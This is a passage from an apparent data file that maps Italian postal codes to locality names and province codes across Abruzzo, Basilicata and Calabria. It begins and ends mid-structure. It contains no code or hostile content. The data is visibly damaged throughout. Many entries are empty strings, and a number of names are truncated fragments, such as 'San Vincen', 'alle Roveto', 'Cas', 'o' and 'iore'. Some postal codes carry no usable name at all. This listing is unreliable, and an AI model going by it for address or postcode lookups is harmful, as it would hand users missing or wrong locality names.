["Torrone", "AQ"], ["Marane", "AQ"], ["Arabona", "AQ"], ["", "AQ"], ], "67040": [["Collarmele", "AQ"], ["Ocre", "AQ"], ["San Martino D'Ocre", "AQ"]], "67041": [["", "AQ"], ["Aielli", "AQ"]], "67043": [["Celano", "AQ"]], "67044": [["Cerchio", "AQ"]], "67045": [["Lucoli", "AQ"], ["", "AQ"], ["Casamaina", "AQ"], ["", "AQ"]], "67046": [["", "AQ"], ["S", "AQ"], ["Ovindoli", "AQ"]], "67047": [["", "AQ"]], "67048": [["", "AQ"], ["Rovere", "AQ"], ["", "AQ"]], "67049": [ ["", "AQ"], ["", "AQ"], ["Villagrande", "AQ"], ["", "AQ"], ["Tornimparte", "AQ"], ["", "AQ"], ], "67050": [ ["Ortucchio", "AQ"], ["Roccavivi", "AQ"], ["Castellafiume", "AQ"], ["", "AQ"], ["Forme", "AQ"], ["Villavallelonga", "AQ"], ["Canistro Inferiore", "AQ"], ["Collelongo", "AQ"], ["Pagliara", "AQ"], ["alle Roveto", "AQ"], ["", "AQ"], ["Corona", "AQ"], ["Bisegna", "AQ"], ["Canistro", "AQ"], ["", "AQ"], ["San Vincenzo Valle Roveto Superiore", "AQ"], ["Albe", "AQ"], ["Castronovo", "AQ"], ["", "AQ"], ["Canistro Superiore", "AQ"], ["", "AQ"], ["Morino", "AQ"], ["", "AQ"], ["Rendinara", "AQ"], ["Grancia", "AQ"], ["Carrito", "AQ"], ["", "AQ"], ["", "AQ"], ], "67051": [ ["", "AQ"], ["Cese", "AQ"], ["Antrosano", "AQ"], ["Santuario Di Pietracquaria", "AQ"], ["Avezzano", "AQ"], ["Paterno", "AQ"], ], "67052": [["", "AQ"], ["Ridotti", "AQ"], ["", "AQ"], ["Balsorano", "AQ"]], "67053": [ ["Capistrello", "AQ"], ["Corcumello", "AQ"], ["Pescocanale", "AQ"], ["Pescocanale Di Capistrello", "AQ"], ], "67054": [["Meta", "AQ"], ["", "AQ"]], "67055": [["", "AQ"], ["", "AQ"]], "67056": [["", "AQ"]], "67057": [["Venere", "AQ"], ["Pescina", "AQ"]], "67058": [["", "AQ"]], "67059": [["Trasacco", "AQ"]], "67060": [["Cappadocia", "AQ"], ["", "AQ"], ["Verrecchie", "AQ"]], "67061": [ ["", "AQ"], ["Pietrasecca", "AQ"], ["Montesabinese", "AQ"], ["", "AQ"], ["Carsoli", "AQ"], ["", "AQ"], ["", "AQ"], ], "67062": [ ["", "AQ"], ["", "AQ"], ["Rosciolo", "AQ"], ["", "AQ"], ], "67063": [["Oricola", "AQ"], ["Civita", "AQ"]], "67064": [["Pereto", "AQ"]], "67066": [["", "AQ"]], "67067": [ ["Scanzano", "AQ"], ["", "AQ"], ["", "AQ"], ["", "AQ"], ], "67068": [["", "AQ"], ["Cappelle", "AQ"], ["", "AQ"]], "67069": [ ["", "AQ"], ["", "AQ"], ["", "AQ"], ["Gallo", "AQ"], ["Tremonti", "AQ"], ["San Donato", "AQ"], ["Tagliacozzo", "AQ"], ["Sorbo", "AQ"], ["", "AQ"], ["", "AQ"], ["Poggetello", "AQ"], ["", "AQ"], ["Roccacerro", "AQ"], ], "67100": [ ["Pagliare", "AQ"], ["Arischia", "AQ"], ["Monticchio", "AQ"], ["San Gregorio", "AQ"], ["San Vittorino", "AQ"], ["Tempera", "AQ"], ["Bagno", "AQ"], ["Preturo", "AQ"], ["Pile", "AQ"], ["Aragno", "AQ"], ["", "AQ"], ["Pianola", "AQ"], ["", "AQ"], ["", "AQ"], ["Coppito", "AQ"], ["Assergi", "AQ"], ["Forcella", "AQ"], ["Onna", "AQ"], ["Santi", "AQ"], ["L'Aquila", "AQ"], ["Paganica", "AQ"], ["", "AQ"], ["", "AQ"], ["Collebrincioni", "AQ"], ["Campo Imperatore", "AQ"], ["Bazzano", "AQ"], ["", "AQ"], ["Camarda", "AQ"], ["Sassa", "AQ"], ], "66010": [ ["Gessopalena", "CH"], ["Pennapiedimonte", "CH"], ["Ari", "CH"], ["", "CH"], ["", "CH"], ["Tollo", "CH"], ["Roccamontepiano", "CH"], ["", "CH"], ["Pretoro", "CH"], ["", "CH"], ["Montenerodomo", "CH"], ["Semivicoli", "CH"], ["", "CH"], ["Lettopalena", "CH"], ["", "CH"], ["Vacri", "CH"], ["", "CH"], ["Terranova", "CH"], ["", "CH"], ["Rapino", "CH"], ["", "CH"], ["", "CH"], ["Miglianico", "CH"], ["Casacanditella", "CH"], ["Castelferrato", "CH"], ["Palombaro", "CH"], ["Colledimacine", "CH"], ["Villamagna", "CH"], ], "66011": [["", "CH"], ["Bucchianico", "CH"]], "66012": [["Casalincontrada", "CH"]], "66014": [["", "CH"], ["Crecchio", "CH"]], "66015": [["", "CH"]], "66016": [ ["", "CH"], ["Comino", "CH"], ["", "CH"], ["Caporosso", "CH"], ["Guardiagrele", "CH"], ], "66017": [["Palena", "CH"]], "66018": [["", "CH"]], "66019": [["Fallascoso", "CH"], ["", "CH"]], "66020": [ ["", "CH"], ["Pollutri", "CH"], ["Villalfonsina", "CH"], ["", "CH"], ["Sambuceto", "CH"], ["", "CH"], ["", "CH"], ["Paglieta", "CH"], ["", "CH"], ["Sant'Egidio", "CH"], ["Scerni", "CH"], ], "66021": [["Miracoli", "CH"], ["Cas", "CH"], ["Casalbordino", "CH"]], "66022": [["Villascorciosa", "CH"], ["Scorciosa", "CH"], ["", "CH"], ["Fossacesia", "CH"]], "66023": [["", "CH"], ["", "CH"]], "66026": [ ["Ortona", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ], "66030": [ ["Montazzoli", "CH"], ["Filetto", "CH"], ["", "CH"], ["", "CH"], ["Arielli", "CH"], ["Guastameroli", "CH"], ["Poggiofiorito", "CH"], ["Treglio", "CH"], ["Frisa", "CH"], ["", "CH"], ["Mozzagrogna", "CH"], ], "66031": [["Casalanguida", "CH"]], "66032": [["", "CH"]], "66033": [["", "CH"]], "66034": [ ["Rizzacorno", "CH"], ["", "CH"], ["Lanciano", "CH"], ["Nasuti", "CH"], ["Sant'Amato", "CH"], ["", "CH"], ], "66036": [["Orsogna", "CH"]], "66037": [["", "CH"]], "66038": [["", "CH"], ["", "CH"], ["", "CH"]], "66040": [ ["Pennadomo", "CH"], ["Roccascalegna", "CH"], ["Pietraferrazzana", "CH"], ["Quadri", "CH"], ["Civitaluparella", "CH"], ["Rosello", "CH"], ["Giuliopoli", "CH"], ["Selva", "CH"], ["Pizzoferrato", "CH"], ["", "CH"], ["Altino", "CH"], ["Monteferrante", "CH"], ["Perano", "CH"], ["Montelapiano", "CH"], ["Buonanotte", "CH"], ["Colledimezzo", "CH"], ["Fallo", "CH"], ["", "CH"], ["", "CH"], ["Gamberale", "CH"], ["Borrello", "CH"], ["Castelguidone", "CH"], ], "66041": [ ["", "CH"], ["Atessa", "CH"], ["", "CH"], ["", "CH"], ["Piazzano", "CH"], ], "66042": [["Bomba", "CH"]], "66043": [["Casoli", "CH"], ["", "CH"]], "66044": [["", "CH"], ["Archi", "CH"]], "66045": [["", "CH"], ["", "CH"]], "66046": [["", "CH"], ["Tornareccio", "CH"]], "66047": [["", "CH"]], "66050": [ ["Lentella", "CH"], ["Guardiabruna", "CH"], ["Tufillo", "CH"], ["Torrebruna", "CH"], ["", "CH"], ["", "CH"], ["Roccaspinalveti", "CH"], ["Furci", "CH"], ["Guilmi", "CH"], ["Dogliola", "CH"], ["Olmi", "CH"], ["", "CH"], ["Fraine", "CH"], ["Liscia", "CH"], ["Monteodorisio", "CH"], ["", "CH"], ["Carunchio", "CH"], ["Fresagrandinaria", "CH"], ["", "CH"], ["Palmoli", "CH"], ], "66051": [["Cupello", "CH"]], "66052": [["Gissi", "CH"]], "66054": [ ["", "CH"], ["", "CH"], ["Vasto", "CH"], ["", "CH"], ["", "CH"], ], "66100": [ ["Brecciarola", "CH"], ["Tricalle", "CH"], ["Chieti", "CH"], ["", "CH"], ["", "CH"], ], "65010": [ ["", "PE"], ["Moscufo", "PE"], ["", "PE"], ["", "PE"], ["Elice", "PE"], ["Piccianello", "PE"], ["Vicoli", "PE"], ["", "PE"], ["Collecorvino", "PE"], ["", "PE"], ["", "PE"], ["Spoltore", "PE"], ["Barberi", "PE"], ["Farindola", "PE"], ["Vestea", "PE"], ["", "PE"], ["Congiunti", "PE"], ["Brittoli", "PE"], ["", "PE"], ["Civitaquana", "PE"], ["", "PE"], ["Nocciano", "PE"], ["Picciano", "PE"], ["", "PE"], ], "65011": [["Catignano", "PE"]], "65012": [ ["Villareia", "PE"], ["", "PE"], ["Vallemare", "PE"], ["Villanova", "PE"], ["Cepagatti", "PE"], ], "65013": [ ["Marina", "PE"], ["", "PE"], ["", "PE"], ["", "PE"], ], "65014": [["", "PE"]], "65015": [ ["", "PE"], ["", "PE"], ["Montesilvano", "PE"], ["", "PE"], ["", "PE"], ], "65017": [["Penne", "PE"], ["Roccafinadamo", "PE"]], "65019": [["Pianella", "PE"], ["Cerratina", "PE"], ["Castellana", "PE"]], "65020": [ ["Bolognano", "PE"], ["Cugnoli", "PE"], ["", "PE"], ["Alanno", "PE"], ["Corvara", "PE"], ["Salle", "PE"], ["", "PE"], ["", "PE"], ["Pietranico", "PE"], ["Ticchione", "PE"], ["Lettomanoppello", "PE"], ["Musellaro", "PE"], ["Roccamorice", "PE"], ["", "PE"], ["Rosciano", "PE"], ["", "PE"], ["Abbateggio", "PE"], ["San Valentino In Abruzzo Citeriore", "PE"], ["Pescosansonesco", "PE"], ["Turrivalignani", "PE"], ["Pesconuovo", "PE"], ["", "PE"], ["", "PE"], ["", "PE"], ], "65022": [["", "PE"], ["", "PE"]], "65023": [["", "PE"], ["", "PE"]], "65024": [ ["Ripacorbaria", "PE"], ["Manoppello", "PE"], ["", "PE"], ["", "PE"], ], "65025": [["Serramonacesca", "PE"]], "65026": [["Popoli", "PE"]], "65027": [["Scafa", "PE"], ["Decontra", "PE"]], "65028": [["", "PE"]], "65029": [["", "PE"]], "65100": [["Pescara", "PE"]], "65121": [["Pescara", "PE"]], "65122": [["Pescara", "PE"]], "65123": [["Pescara", "PE"]], "65124": [["Pescara", "PE"]], "65125": [["Pescara", "PE"], ["", "PE"]], "65126": [["Pescara", "PE"]], "65127": [["Pescara", "PE"]], "65128": [["Pescara", "PE"]], "65129": [["Pescara", "PE"], ["", "PE"]], "65131": [["Fontanelle", "PE"]], "65132": [["", "PE"], ["Pescara", "PE"]], "64010": [ ["", "TE"], ["", "TE"], ["Cesano", "TE"], ["Colonnella", "TE"], ["", "TE"], ["Ancarano", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["Pietralta", "TE"], ["Ioanella", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["Controguerra", "TE"], ["", "TE"], ["Pascellata", "TE"], ["Ponzano", "TE"], ["", "TE"], ["", "TE"], ["Leofara", "TE"], ["", "TE"], ], "64011": [["", "TE"]], "64012": [ ["Paterno", "TE"], ["", "TE"], ["Sant'Onofrio", "TE"], ["Piancarani", "TE"], ["Campli", "TE"], ["Campovalano", "TE"], ["", "TE"], ], "64013": [["Corropoli", "TE"]], "64014": [["Martinsicuro", "TE"], ["", "TE"], ["", "TE"]], "64015": [["Nereto", "TE"]], "64016": [ ["", "TE"], ["Paolantonio", "TE"], ["Faraone", "TE"], ["", "TE"], ["", "TE"], ], "64018": [["Tortoreto", "TE"], ["Salino", "TE"], ["", "TE"]], "64020": [ ["", "TE"], ["Zaccheo", "TE"], ["Canzano", "TE"], ["Pagliare", "TE"], ["Petriccione", "TE"], ["", "TE"], ["Casemolino", "TE"], ["", "TE"], ["Castelbasso", "TE"], ["Castellalto", "TE"], ["", "TE"], ["Ripattoni", "TE"], ["", "TE"], ["Bellante", "TE"], ], "64021": [["", "TE"], ["Colleranesco", "TE"], ["Giulianova", "TE"]], "64023": [["", "TE"], ["Montone", "TE"], ["Notaresco Stazione", "TE"]], "64024": [["", "TE"], ["", "TE"], ["Notaresco", "TE"]], "64025": [ ["", "TE"], ["Mutignano", "TE"], ["Scerne", "TE"], ["", "TE"], ["Pineto", "TE"], ], "64026": [ ["Cologna", "TE"], ["Montepagano", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ], "64027": [["Garrufo", "TE"], ["", "TE"], ["Sant'Omero", "TE"]], "64028": [["Pianacce", "TE"], ["", "TE"], ["", "TE"], ["Silvi", "TE"]], "64030": [["Basciano", "TE"], ["", "TE"], ["Montefino", "TE"], ["", "TE"]], "64031": [["Arsita", "TE"]], "64032": [ ["Atri", "TE"], ["Casoli", "TE"], ["", "TE"], ["", "TE"], ["Fontanelle", "TE"], ["", "TE"], ["", "TE"], ["Treciminiere", "TE"], ["", "TE"], ], "64033": [["Bisenti", "TE"]], "64034": [["Appignano", "TE"], ["", "TE"]], "64035": [["Castilenti", "TE"], ["", "TE"]], "64036": [["Scorrano", "TE"], ["", "TE"]], "64037": [["Montegualtieri", "TE"], ["", "TE"], ["Cermignano", "TE"]], "64039": [["", "TE"], ["", "TE"]], "64040": [["Cortino", "TE"], ["Padula", "TE"], ["Pagliaroli", "TE"]], "64041": [["Castelli", "TE"], ["Colledoro", "TE"]], "64042": [["Colledara", "TE"], ["", "TE"], ["", "TE"]], "64043": [ ["Cesacastina", "TE"], ["Crognaleto", "TE"], ["Tottea", "TE"], ["", "TE"], ["Cervaro", "TE"], ["", "TE"], ["", "TE"], ["Nerito", "TE"], ["", "TE"], ], "64044": [["Cerqueto", "TE"], ["", "TE"]], "64045": [ ["", "TE"], ["", "TE"], ["Cerchiara", "TE"], ["", "TE"], ["", "TE"], ], "64046": [ ["Cusciano", "TE"], ["", "TE"], ["Leognano", "TE"], ["", "TE"], ], "64047": [["Intermesoli", "TE"], ["Pietracamela", "TE"]], "64049": [["Chiarino", "TE"], ["Azzinano", "TE"], ["Tossicia", "TE"]], "64100": [ ["", "TE"], ["", "TE"], ["' A Tordino", "TE"], ["", "TE"], ["Tordinia", "TE"], ["Varano", "TE"], ["Castagneto", "TE"], ["Forcella", "TE"], ["Nepezzano", "TE"], ["Miano", "TE"], ["Cartecchio", "TE"], ["", "TE"], ["Frondarola", "TE"], ["Sant'Atto", "TE"], ["", "TE"], ["Colleminuccio", "TE"], ["", "TE"], ["Teramo", "TE"], ["", "TE"], ["Spiano", "TE"], ], "75010": [ ["Miglionico", "MT"], ["Craco", "MT"], ["Garaguso", "MT"], ["Peschiera", "MT"], ["Grottole", "MT"], ["", "MT"], ["Calciano", "MT"], ["Gorgoglione", "MT"], ["Cirigliano", "MT"], ["Aliano", "MT"], ["", "MT"], ], "75011": [["Accettura", "MT"]], "75012": [["", "MT"], ["Metaponto", "MT"], ["Bernalda", "MT"], ["", "MT"]], "75013": [["Macchia", "MT"], ["", "MT"], ["Ferrandina", "MT"]], "75014": [["Grassano", "MT"]], "75015": [["Pisticci", "MT"], ["Marconia", "MT"], ["", "MT"]], "75016": [["Pomarico", "MT"]], "75017": [["Salandra", "MT"]], "75018": [["Stigliano", "MT"]], "75019": [["Tricarico", "MT"], ["Calle", "MT"]], "75020": [ ["", "MT"], ["o", "MT"], ["", "MT"], ["Recoleta", "MT"], ["Nova Siri Stazione", "MT"], ], "75021": [["Colobraro", "MT"]], "75022": [["Irsina", "MT"], ["Taccone", "MT"]], "75023": [["", "MT"]], "75024": [["Montescaglioso", "MT"]], "75025": [["Policoro", "MT"]], "75026": [["Rotondella", "MT"]], "75027": [["", "MT"]], "75028": [["Gannano", "MT"], ["Caprarico", "MT"], ["Tursi", "MT"]], "75029": [["Valsinni", "MT"]], "75100": [["", "MT"], ["Matera", "MT"], ["Venusio", "MT"]], "85010": [ ["Gallicchio", "PZ"], ["Banzi", "PZ"], ["", "PZ"], ["Abriola", "PZ"], ["", "PZ"], ["Armento", "PZ"], ["Calvello", "PZ"], ["", "PZ"], ["Pignola", "PZ"], ["", "PZ"], ["Rifreddo", "PZ"], ["Pantano", "PZ"], ["Castelmezzano", "PZ"], ["", "PZ"], ["Campomaggiore", "PZ"], ["Cancellara", "PZ"], ["Pietrapertosa", "PZ"], ["", "PZ"], ["Missanello", "PZ"], ["Anzi", "PZ"], ], "85011": [["Acerenza", "PZ"]], "85012": [["", "PZ"]], "85013": [["", "PZ"]], "85014": [["Laurenzana", "PZ"]], "85015": [["", "PZ"]], "85016": [["Pietragalla", "PZ"], ["San Giorgio", "PZ"]], "85017": [["Tolve", "PZ"]], "85018": [["Trivigno", "PZ"]], "85020": [ ["", "PZ"], ["", "PZ"], ["Ginestra", "PZ"], ["Sterpito", "PZ"], ["", "PZ"], ["", "PZ"], ["Dragonetti", "PZ"], ["Filiano", "PZ"], ["", "PZ"], ["Sant'Andrea", "PZ"], ["Rapone", "PZ"], ["Maschito", "PZ"], ["", "PZ"], ["Atella", "PZ"], ["", "PZ"], ["Montemilone", "PZ"], ["Sant'Ilario", "PZ"], ["Lagopesole", "PZ"], ["Pescopagano", "PZ"], ["Scalera", "PZ"], ["Ripacandida", "PZ"], ["", "PZ"], ["", "PZ"], ], "85021": [ ["Avigliano", "PZ"], ["", "PZ"], ["", "PZ"], ["Sant'Angelo", "PZ"], ["", "PZ"], ["Possidente", "PZ"], ["", "PZ"], ], "85022": [["Barile", "PZ"]], "85023": [["Forenza", "PZ"]], "85024": [["Gaudiano", "PZ"], ["Lavello", "PZ"]], "85025": [["Foggiano", "PZ"], ["Melfi", "PZ"], ["", "PZ"]], "85026": [["", "PZ"]], "85027": [["Rapolla", "PZ"]], "85028": [["Monticchio", "PZ"], ["Rionero In Vulture", "PZ"], ["", "PZ"]], "85029": [["Venosa", "PZ"]], "85030": [ ["Mezzana", "PZ"], ["Calvera", "PZ"], ["", "PZ"], ["", "PZ"], ["", "PZ"], ["Carbone", "PZ"], ["Cersosimo", "PZ"], ["", "PZ"], ["", "PZ"], ["", "PZ"], ["Villaneto", "PZ"], ["", "PZ"], ["", "PZ"], ["", "PZ"], ], "85031": [["Castelsaraceno", "PZ"], ["Frusci", "PZ"], ["Miraldo", "PZ"]], "85032": [["Teana", "PZ"], ["Chiaromonte", "PZ"]], "85033": [["Episcopia", "PZ"]], "85034": [["Fardella", "PZ"], ["", "PZ"]], "85035": [["Noepoli", "PZ"]], "85036": [["Roccanova", "PZ"]], "85037": [["", "PZ"], ["Sant'Arcangelo", "PZ"]], "85038": [["Senise", "PZ"]], "85039": [["Spinoso", "PZ"]], "85040": [ ["", "PZ"], ["Rivello", "PZ"], ["", "PZ"], ["", "PZ"], ["Viggianello", "PZ"], ["", "PZ"], ["", "PZ"], ["Nemoli", "PZ"], ], "85042": [["Lagonegro", "PZ"]], "85043": [["Latronico", "PZ"], ["Mileo", "PZ"], ["Cerri", "PZ"], ["Agromonte", "PZ"], ["Magnano", "PZ"]], "85044": [ ["Lauria", "PZ"], ["Seluci", "PZ"], ["", "PZ"], ["Cogliandrino", "PZ"], ["", "PZ"], ["Galdo", "PZ"], ["", "PZ"], ["Pecorone", "PZ"], ], "85046": [ ["Massa", "PZ"], ["", "PZ"], ["Acquafredda", "PZ"], ["", "PZ"], ["Maratea", "PZ"], ], "85047": [["Moliterno", "PZ"]], "85048": [["Rotonda", "PZ"]], "85049": [["Trecchina", "PZ"], ["", "PZ"]], "85050": [ ["", "PZ"], ["", "PZ"], ["", "PZ"], ["Castelgrande", "PZ"], ["Balvano", "PZ"], ["Sarconi", "PZ"], ["", "PZ"], ["", "PZ"], ["", "PZ"], ["Tito", "PZ"], ["", "PZ"], ["Brienza", "PZ"], ["", "PZ"], ["Marsicovetere", "PZ"], ["Paterno", "PZ"], ["Baragiano", "PZ"], ["", "PZ"], ], "85051": [["Bella", "PZ"], ["", "PZ"]], "85052": [["Galaino", "PZ"], ["Pergola", "PZ"], ["", "PZ"]], "85053": [["Montemurro", "PZ"]], "85054": [["", "PZ"], ["", "PZ"]], "85055": [["Picerno", "PZ"]], "85056": [["Ruoti", "PZ"]], "85057": [["Tramutola", "PZ"]], "85058": [["Mosileo", "PZ"], ["", "PZ"]], "85059": [["Viggiano", "PZ"]], "85100": [["Giuliano", "PZ"], ["Montocchio", "PZ"], ["Potenza", "PZ"]], "87010": [ ["Lattarico", "CS"], ["Saracena", "CS"], ["Acquaformosa", "CS"], ["Mottafollone", "CS"], ["Regina", "CS"], ["", "CS"], ["", "CS"], ["Cervicati", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Civita", "CS"], ["Frascineto", "CS"], ["Malvito", "CS"], ["Firmo", "CS"], ["", "CS"], ["Lungro", "CS"], ["Sartano", "CS"], ["San Basile", "CS"], ["", "CS"], ["Policastrello", "CS"], ["Eianina", "CS"], ["", "CS"], ["Ioggi", "CS"], ["San Donato Di Ninea", "CS"], ["San Sosti", "CS"], ], "87011": [ ["Sibari Stazione", "CS"], ["Lattughelle", "CS"], ["Lauropoli", "CS"], ["Pianoscafo", "CS"], ["Sibari", "CS"], ["Doria", "CS"], ["", "CS"], ], "87012": [["", "CS"], ["Castrovillari", "CS"]], "87013": [["", "CS"]], "87014": [["", "CS"]], "87015": [["", "CS"]], "87016": [["", "CS"]], "87017": [["", "CS"]], "87018": [ ["San Marco Argentano Stazione", "CS"], ["San Marco Roggiano Stazione", "CS"], ["San Marco Argentano", "CS"], ], "87019": [["Spezzano Albanese Stazione", "CS"], ["Spezzano Albanese Terme", "CS"], ["Spezzano Albanese", "CS"]], "87020": [ ["", "CS"], ["Sangineto", "CS"], ["Marcellina", "CS"], ["Acquappesa", "CS"], ["Maiera'", "CS"], ["", "CS"], ["Bonifati", "CS"], ["", "CS"], ["Grisolia", "CS"], ["Aieta", "CS"], ["Buonvicino", "CS"], ["Torrevecchia", "CS"], ["Orsomarso", "CS"], ["", "CS"], ["Le Crete", "CS"], ["Granata", "CS"], ["", "CS"], ["", "CS"], ["Intavolata", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Verbicaro", "CS"], ["Papasidero", "CS"], ["", "CS"], ["", "CS"], ["Tortora", "CS"], ], "87021": [["Laise", "CS"], ["", "CS"], ["", "CS"]], "87022": [ ["", "CS"], ["Cetraro", "CS"], ["", "CS"], ["Battendieri", "CS"], ["", "CS"], ["Sant'Angelo", "CS"], ], "87023": [["Cirella", "CS"], ["Diamante", "CS"]], "87024": [["Cariglio", "CS"], ["", "CS"], ["Scarcelli", "CS"], ["Fuscaldo", "CS"]], "87026": [["Mormanno", "CS"]], "87027": [ ["", "CS"], ["", "CS"], ["Paola", "CS"], ["", "CS"], ["Fosse", "CS"], ["", "CS"], ], "87028": [["", "CS"]], "87029": [["Scalea", "CS"]], "87030": [ ["San Vincen", "CS"], ["", "CS"], ["Carolei", "CS"], ["Belsito", "CS"], ["Domanico", "CS"], ["San ", "CS"], ["", "CS"], ["", "CS"], ["Malito", "CS"], ["", "CS"], ["Cleto", "CS"], ["", "CS"], ["Vadue", "CS"], ["", "CS"], ["Longobardi", "CS"], ["Savuto", "CS"], ["Scornavacca", "CS"], ["Gesuiti", "CS"], ["Torremezzo", "CS"], ["", "CS"], ["", "CS"], ["San Biase", "CS"], ["Reggio", "CS"], ], "87031": [["", "CS"]], "87032": [["", "CS"], ["Amantea", "CS"], ["", "CS"], ["Corica", "CS"]], "87033": [["", "CS"], ["", "CS"], ["Vadi", "CS"]], "87034": [["Grimaldi", "CS"]], "87035": [["Terrati", "CS"], ["Greci", "CS"], ["", "CS"], ["Lago", "CS"]], "87036": [ ["Roges", "CS"], ["", "CS"], ["Arcavacata", "CS"], ["Commenda", "CS"], ["Rende", "CS"], ["Castiglione Cosentino Stazione", "CS"], ["Surdo", "CS"], ["Quattromiglia", "CS"], ], "87037": [["", "CS"], ["Bucita", "CS"]], "87038": [["", "CS"], ["Pollella", "CS"]], "87040": [ ["", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Mongrassano", "CS"], ["Rosario", "CS"], ["", "CS"], ["Rose", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Cavallerizzo", "CS"], ["", "CS"], ["", "CS"], ["Andreotta", "CS"], ["", "CS"], ["Zumpano", "CS"], ["Malavicina", "CS"], ["", "CS"], ["", "CS"], ["Mendicino", "CS"], ["Tarsia", "CS"], ["Luzzi", "CS"], ["Tivolille", "CS"], ["", "CS"], ["", "CS"], ["Ortomatera", "CS"], ["", "CS"], ["Timparello", "CS"], ["Maione", "CS"], ["Cerzeto", "CS"], ["Altilia", "CS"], ["Castrolibero", "CS"], ["Parenti", "CS"], ], "87041": [ ["Acri", "CS"], ["Montagnola", "CS"], ["Serricella", "CS"], ["", "CS"], ["Duglia", "CS"], ], "87042": [["Altomonte", "CS"]], "87043": [["Bisignano", "CS"]], "87044": [["Cerisano", "CS"]], "87045": [["Laurignano", "CS"], ["Tessano", "CS"], ["Dipignano", "CS"]], "87046": [ ["Parantoro", "CS"], ["Caldopiano", "CS"], ["", "CS"], ["Vaccarizzo", "CS"], ["", "CS"], ], "87047": [["Redipiano", "CS"], [" In Guarano", "CS"], ["San Pietro In Guarano", "CS"]], "87048": [["", "CS"]], "87050": [ ["", "CS"], ["Trenta", "CS"], ["Carpanzano", "CS"], ["Magli", "CS"], ["", "CS"], ["Morelli", "CS"], ["Perito", "CS"], ["", "CS"], ["Rovito", "CS"], ["Bianchi", "CS"], ["Pedace", "CS"], ["Marzi", "CS"], ["Borboruso", "CS"], ["Panettieri", "CS"], ["Pedivigliano", "CS"], ["Colosimi", "CS"], ["", "CS"], ["", "CS"], ["Cellara", "CS"], ["", "CS"], ["Pietrafitta", "CS"], ["Mangone", "CS"], ["", "CS"], ["Lappano", "CS"], ], "87051": [["Vico", "CS"], ["", "CS"], ["Aprigliano", "CS"]], "87052": [ ["Moccone", "CS"], ["", "CS"], ["", "CS"], ["Camigliatello", "CS"], ["", "CS"], ], "87053": [["Celico", "CS"]], "87054": [["Rogliano", "CS"], ["Saliano", "CS"]], "87055": [["Lorica", "CS"], ["", "CS"], ["iore", "CS"]], "87056": [["", "CS"]], "87057": [["Scigliano", "CS"], ["Diano", "CS"], ["Calvisi", "CS"]], "87058": [["", "CS"]], "87060": [ ["Marinella", "CS"], ["", "CS"], ["", "CS"], ["San Cosmo Albanese", "CS"], ["Terravecchia", "CS"], ["Pietrapaola Stazione", "CS"], ["Caloveto", "CS"], ["Paludi", "CS"], ["San Giorgio Albanese", "CS"], ["Calopezzati", "CS"], ["Crosia", "CS"], ["Camigliano", "CS"], ["Mirto", "CS"], ["Cropalati", "CS"], ["Vecchiarello", "CS"], ["Bocchigliero", "CS"], ["Pietrapaola", "CS"], ["", "CS"], ["Mandatoriccio", "CS"], ], "87061": [["Campana", "CS"]], "87062": [["Cariati", "CS"], ["", "CS"]], "87064": [ ["", "CS"], ["Fabrizio", "CS"], ["", "CS"], ["Schiavonea", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Cantinella", "CS"], ], "87066": [["Longobucco", "CS"], ["Destro", "CS"]], "87067": [["Rossano", "CS"], ["Piragineti", "CS"], ["Amica", "CS"], ["Rossano Stazione", "CS"]], "87069": [["", "CS"], ["", "CS"]], "87070": [ ["Castroregio", "CS"], ["Canna", "CS"], ["Plataci", "CS"], ["Farneta", "CS"], ["Albidona", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Nocara", "CS"], ["Montegiordano", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ], "87071": [["", "CS"], ["Amendolara", "CS"]], "87072": [["", "CS"]], "87073": [["Oriolo", "CS"]], "87074": [["", "CS"], ["", "CS"]], "87075": [["Trebisacce", "CS"]], "87076": [ ["", "CS"], ["", "CS"], ["Villapiana", "CS"], ["", "CS"], ], "87100": [ ["Cosenza", "CS"], ["", "CS"], ["Donnici Inferiore", "CS"], ["Sant'Ippolito Di Cosenza", "CS"], ["", "CS"], ["Casali", "CS"], ["Sanvito", "CS"], ], "88020": [["Jacurso", "CZ"], ["Cortale", "CZ"]], "88021": [["Roccelletta", "CZ"], ["Borgia", "CZ"], ["San Floro", "CZ"]], "88022": [["Curinga", "CZ"], ["Acconia", "CZ"]], "88024": [["Girifalco", "CZ"]], "88025": [["San Pietro A Maida", "CZ"], ["Maida", "CZ"]], "88040": [ ["Martelletto", "CZ"], ["Martirano", "CZ"], ["", "CZ"], ["San Pietro Apostolo", "CZ"], ["Cicala", "CZ"], ["", "CZ"], ["Conflenti", "CZ"], ["", "CZ"], ["", "CZ"], ["Amato", "CZ"], ["Settingiano", "CZ"], ["Castagna", "CZ"], ["Serrastretta", "CZ"], ["Platania", "CZ"], ["", "CZ"], ["Pianopoli", "CZ"], ["", "CZ"], ["Carlopoli", "CZ"], ["San Michele", "CZ"], ["Cancello", "CZ"], ["Ievoli", "CZ"], ["Angoli", "CZ"], ["San Mazzeo", "CZ"], ["", "CZ"], ["Gizzeria", "CZ"], ["Miglierina", "CZ"], ["Accaria", "CZ"], ["Conflenti Inferiore", "CZ"], ["Migliuso", "CZ"], ], "88041": [["Decollatura", "CZ"], ["San Bernardo", "CZ"], ["Adami", "CZ"], ["Cerrisi", "CZ"]], "88042": [["", "CZ"], ["Falerna", "CZ"], ["", "CZ"]], "88044": [["Marcellinara", "CZ"]], "88045": [ ["", "CZ"], ["Gimigliano", "CZ"], ["", "CZ"], ["Cavora'", "CZ"], ], "88046": [ ["", "CZ"], ["", "CZ"], ["Fronti", "CZ"], ["Zangarona", "CZ"], ["Nicastro", "CZ"], ["Caronte", "CZ"], ["", "CZ"], ["", "CZ"], ["Gabella", "CZ"], ["", "CZ"], ["Sambiase", "CZ"], ["Acquafredda", "CZ"], ["", "CZ"], ["", "CZ"], ], "88047": [["", "CZ"], ["inese", 